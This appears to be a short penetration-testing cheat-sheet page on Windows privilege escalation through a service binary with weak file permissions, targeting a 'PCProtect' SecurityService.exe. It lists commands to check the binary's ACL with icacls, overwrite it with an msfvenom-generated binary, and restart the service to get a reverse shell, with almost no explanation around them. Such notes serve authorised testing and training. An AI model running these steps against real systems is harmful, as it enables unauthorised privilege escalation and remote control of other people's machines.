weak-permission-in-acl

This tool identified the PC security Management service , which executes security service.exe binary.

Check permissions

icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Replace service binary with msfvenom binary

cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"

sc start SecurityService

OR Get a reverse shell:

net start SecurityService

Last updated 1 day ago